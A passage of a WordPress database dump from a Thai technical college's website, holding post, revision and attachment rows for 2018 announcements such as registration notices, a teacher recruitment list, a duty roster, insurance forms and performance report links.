(2021, 3, '2018-04-26 10:18:35', '2018-04-26 03:18:35', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D574606849582174%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมต้อนรับคณะศึกษาดูงาน ด้านการจัดการเรียน การสอน ของวิทยาลัยเทคนิคระยอง จากวิทยาลัยเทคนิคอ่างทอง ในวันพุธที่ 25 เมษายน 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%95%e0%b9%89%e0%b8%ad%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9', '', '', '2018-04-26 10:18:35', '2018-04-26 03:18:35', '', 0, 'http://www.technicrayong.ac.th/?p=2021', 432, 'post', '', 0),
(2022, 3, '2018-04-26 10:18:15', '2018-04-26 03:18:15', '', '31265634_574604726249053_6815150661005475840_o', '', 'inherit', 'closed', 'closed', '', '31265634_574604726249053_6815150661005475840_o', '', '', '2018-04-26 10:18:15', '2018-04-26 03:18:15', '', 2021, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/31265634_574604726249053_6815150661005475840_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2023, 3, '2018-04-26 10:18:35', '2018-04-26 03:18:35', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D574606849582174%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมต้อนรับคณะศึกษาดูงาน ด้านการจัดการเรียน การสอน ของวิทยาลัยเทคนิคระยอง จากวิทยาลัยเทคนิคอ่างทอง ในวันพุธที่ 25 เมษายน 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2021-revision-v1', '', '', '2018-04-26 10:18:35', '2018-04-26 03:18:35', '', 2021, 'http://www.technicrayong.ac.th/2021-revision-v1/', 0, 'revision', '', 0),
(2024, 3, '2018-04-26 14:21:52', '2018-04-26 07:21:52', '<h4> <span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลปี-2555.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\">--><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2553<--</a></span></h4>\r\n ', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'inherit', 'closed', 'closed', '', '1706-revision-v1', '', '', '2018-04-26 14:21:52', '2018-04-26 07:21:52', '', 1706, 'http://www.technicrayong.ac.th/1706-revision-v1/', 0, 'revision', '', 0),
(2025, 3, '2018-04-26 14:22:09', '2018-04-26 07:22:09', '<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560<--</a></span></h4>\r\n<h4> <span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลปี-2555.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\">--><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2553<--</a></span></h4>\r\n ', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'inherit', 'closed', 'closed', '', '1706-revision-v1', '', '', '2018-04-26 14:22:09', '2018-04-26 07:22:09', '', 1706, 'http://www.technicrayong.ac.th/1706-revision-v1/', 0, 'revision', '', 0),
(2026, 3, '2018-04-26 15:22:41', '2018-04-26 08:22:41', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A5%E0%B8%87%E0%B8%97%E0%B8%B0%E0%B9%80%E0%B8%9A%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88-1-%E0%B8%9B%E0%B8%B5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ การลงทะเบียนเรียนประจำภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2', '', '', '2018-04-26 15:22:41', '2018-04-26 08:22:41', '', 0, 'http://www.technicrayong.ac.th/?p=2026', 431, 'post', '', 0),
(2028, 3, '2018-04-26 15:21:57', '2018-04-26 08:21:57', '', 'การลงทะเบียนเรียนประจำภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3', '', '', '2018-04-26 15:21:57', '2018-04-26 08:21:57', '', 2026, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/การลงทะเบียนเรียนประจำภาคเรียนที่-1-ปีการศึกษา-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(2029, 3, '2018-04-26 15:22:41', '2018-04-26 08:22:41', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A5%E0%B8%87%E0%B8%97%E0%B8%B0%E0%B9%80%E0%B8%9A%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88-1-%E0%B8%9B%E0%B8%B5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ การลงทะเบียนเรียนประจำภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '2026-revision-v1', '', '', '2018-04-26 15:22:41', '2018-04-26 08:22:41', '', 2026, 'http://www.technicrayong.ac.th/2026-revision-v1/', 0, 'revision', '', 0),
(2030, 3, '2018-04-27 08:46:10', '2018-04-27 01:46:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97%e0%b8%98', '', '', '2018-04-27 08:46:10', '2018-04-27 01:46:10', '', 0, 'http://www.technicrayong.ac.th/?p=2030', 430, 'post', '', 0),
(2031, 3, '2018-04-27 08:45:57', '2018-04-27 01:45:57', '', 'ประกาศรายชื่อผู้มีสิทธิ์สอบคัดเลือก ครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97%e0%b8%98', '', '', '2018-04-27 08:45:57', '2018-04-27 01:45:57', '', 2030, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/ประกาศรายชื่อผู้มีสิทธิ์สอบคัดเลือก-ครูอัตราจ้าง.pdf', 0, 'attachment', 'application/pdf', 0),
(2032, 3, '2018-04-27 08:46:10', '2018-04-27 01:46:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '2030-revision-v1', '', '', '2018-04-27 08:46:10', '2018-04-27 01:46:10', '', 2030, 'http://www.technicrayong.ac.th/2030-revision-v1/', 0, 'revision', '', 0),
(2033, 3, '2018-08-14 10:42:54', '2018-08-14 03:42:54', '<img class=\"aligncenter size-full wp-image-1793\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg\" alt=\"\" width=\"192\" height=\"237\" />\n\n<img class=\"aligncenter wp-image-1794\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-19-24-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\n<h4><img class=\"aligncenter wp-image-1795 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg\" alt=\"\" width=\"494\" height=\"315\" /><a href=\"/wp-content/uploads/2018/08/หนังสือแนะนำการเบิกประกันฯ.pdf\">> หนังสือแนะนำการเบิกประกันฯ</a></h4>\n<h4><a href=\"/wp-content/uploads/2018/08/หนังสือเรียกร้องค่าสินไหมทดแทน.pdf\">> หนังสือเรียกร้องค่าสินไหมทดแทน</a></h4>\n<h4><a href=\"/wp-content/uploads/2018/08/หนังสือสละสิทธิ.pdf\">> หนังสือสละสิทธิ</a></h4>\n<h4></h4>\n ', 'งานสวัสดิการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1792-autosave-v1', '', '', '2018-08-14 10:42:54', '2018-08-14 03:42:54', '', 1792, 'http://www.technicrayong.ac.th/1792-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2034, 3, '2018-04-27 10:53:29', '2018-04-27 03:53:29', '', 'หนังสือแนะนำการเบิกประกันอุบัติเหตุ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%99%e0%b8%b1%e0%b8%87%e0%b8%aa%e0%b8%b7%e0%b8%ad%e0%b9%81%e0%b8%99%e0%b8%b0%e0%b8%99%e0%b8%b3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9a%e0%b8%b4%e0%b8%81%e0%b8%9b%e0%b8%a3%e0%b8%b0', '', '', '2018-04-27 10:53:29', '2018-04-27 03:53:29', '', 1792, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/หนังสือแนะนำการเบิกประกันอุบัติเหตุ.pdf', 0, 'attachment', 'application/pdf', 0),
(2036, 3, '2018-04-27 10:54:26', '2018-04-27 03:54:26', '<img class=\"aligncenter size-full wp-image-1793\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1794\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-19-24-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1795 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg\" alt=\"\" width=\"494\" height=\"315\" />\r\n\r\n<strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/04/หนังสือแนะนำการเบิกประกันอุบัติเหตุ.pdf\">หนังสือแนะนำการเบิกประกันอุบัติเหตุ</a></span></strong>', 'งานสวัสดิการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1792-revision-v1', '', '', '2018-04-27 10:54:26', '2018-04-27 03:54:26', '', 1792, 'http://www.technicrayong.ac.th/1792-revision-v1/', 0, 'revision', '', 0),
(2037, 3, '2018-04-27 10:55:30', '2018-04-27 03:55:30', '<img class=\"aligncenter size-full wp-image-1793\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1794\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-19-24-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1795 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg\" alt=\"\" width=\"494\" height=\"315\" />\r\n<h2><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/04/หนังสือแนะนำการเบิกประกันอุบัติเหตุ.pdf\">>>หนังสือแนะนำการเบิกประกันอุบัติเหตุ</a></span></strong></h2>', 'งานสวัสดิการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1792-revision-v1', '', '', '2018-04-27 10:55:30', '2018-04-27 03:55:30', '', 1792, 'http://www.technicrayong.ac.th/1792-revision-v1/', 0, 'revision', '', 0),
(2038, 3, '2018-04-30 15:14:28', '2018-04-30 08:14:28', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99-%E0%B8%9E%E0%B8%A4%E0%B8%A9%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนพฤษภาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%a9%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b8%a1-2561', '', '', '2018-04-30 15:14:28', '2018-04-30 08:14:28', '', 0, 'http://www.technicrayong.ac.th/?p=2038', 429, 'post', '', 0),
(2039, 3, '2018-04-30 15:14:13', '2018-04-30 08:14:13', '', 'ตารางเวร เดือน พฤษภาคม 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99-%e0%b8%9e%e0%b8%a4%e0%b8%a9%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b8%a1-2561', '', '', '2018-04-30 15:14:13', '2018-04-30 08:14:13', '', 2038, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/ตารางเวร-เดือน-พฤษภาคม-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(2040, 3, '2018-04-30 15:14:28', '2018-04-30 08:14:28', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99-%E0%B8%9E%E0%B8%A4%E0%B8%A9%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนพฤษภาคม 2561', '', 'inherit', 'closed', 'closed', '', '2038-revision-v1', '', '', '2018-04-30 15:14:28', '2018-04-30 08:14:28', '', 2038, 'http://www.technicrayong.ac.th/2038-revision-v1/', 0, 'revision', '', 0),
(2046, 1, '2018-05-02 09:19:15', '2018-05-02 02:19:15', '<a href=\"/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg\"><img class=\"wp-image-6749 aligncenter\" src=\"/wp-content/uploads/2020/02/กรอบรูป6-.png\" alt=\"\" width=\"270\" height=\"405\" /></a>\r\n<p style=\"text-align: center;\">[table id=1 /]</p>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-6750 alignnone\" src=\"/wp-content/uploads/2020/02/กรอบรูป5-.png\" alt=\"\" width=\"270\" height=\"407\" /></p>\r\n<p style=\"text-align: center;\">[table id=3 /]</p>', 'ผลงานวิชาการของผู้บริหาร', '', 'publish', 'closed', 'closed', '', '%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab', '', '', '2020-02-01 11:53:23', '2020-02-01 04:53:23', '', 0, 'http://www.technicrayong.ac.th/?page_id=2046', 0, 'page', '', 0),
(2047, 1, '2018-05-02 08:53:51', '2018-05-02 01:53:51', '[[\"\\u0e19\\u0e32\\u0e07\\u0e13\\u0e31\\u0e10\\u0e18\\u0e32\\u0e23\\u0e35\\u0e22\\u0e4c \\u0e2a\\u0e34\\u0e23\\u0e34\\u0e01\\u0e38\\u0e25\\u0e1b\\u0e31\\u0e0d\\u0e0d\\u0e32\\u0e1e\\u0e23\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e32\\u0e01\\u0e23\",\"<a href=\\\"\\/wp-content\\/uploads\\/2018\\/05\\/Nuttharee-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager', 'รองณัฐธารีย์', 'publish', 'closed', 'closed', '', 'academic-works-for-manager', '', '', '2018-11-02 17:16:37', '2018-11-02 10:16:37', '', 0, 'http://www.technicrayong.ac.th/?post_type=tablepress_table&p=2047', 0, 'tablepress_table', 'application/json', 0),
(2048, 3, '2018-05-02 09:08:14', '2018-05-02 02:08:14', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9E%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%96%E0%B8%B6%E0%B8%87%E0%B9%80%E0%B8%81%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88-2-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน-นักศึกษา พ้นสภาพเนื่องจากผลการเรียนเฉลี่ยไม่ถึงเกณฑ์ ภาคเรียนที่ 2 ปีการศึกษา 2560', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%83%e0%b8%ab%e0%b9%89%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6', '', '', '2018-05-02 09:08:14', '2018-05-02 02:08:14', '', 0, 'http://www.technicrayong.ac.th/?p=2048', 428, 'post', '', 0),
(2049, 3, '2018-05-02 09:08:03', '2018-05-02 02:08:03', '', 'ประกาศ พ้นสภาพผลการเรียนไม่ถึงเกณฑ์ ภาคเรียนที่ 2-2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9e%e0%b9%89%e0%b8%99%e0%b8%aa%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2', '', '', '2018-05-02 09:08:03', '2018-05-02 02:08:03', '', 2048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ประกาศ-พ้นสภาพผลการเรียนไม่ถึงเกณฑ์-ภาคเรียนที่-2-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(2050, 3, '2018-05-02 09:08:14', '2018-05-02 02:08:14', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9E%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%96%E0%B8%B6%E0%B8%87%E0%B9%80%E0%B8%81%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88-2-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน-นักศึกษา พ้นสภาพเนื่องจากผลการเรียนเฉลี่ยไม่ถึงเกณฑ์ ภาคเรียนที่ 2 ปีการศึกษา 2560', '', 'inherit', 'closed', 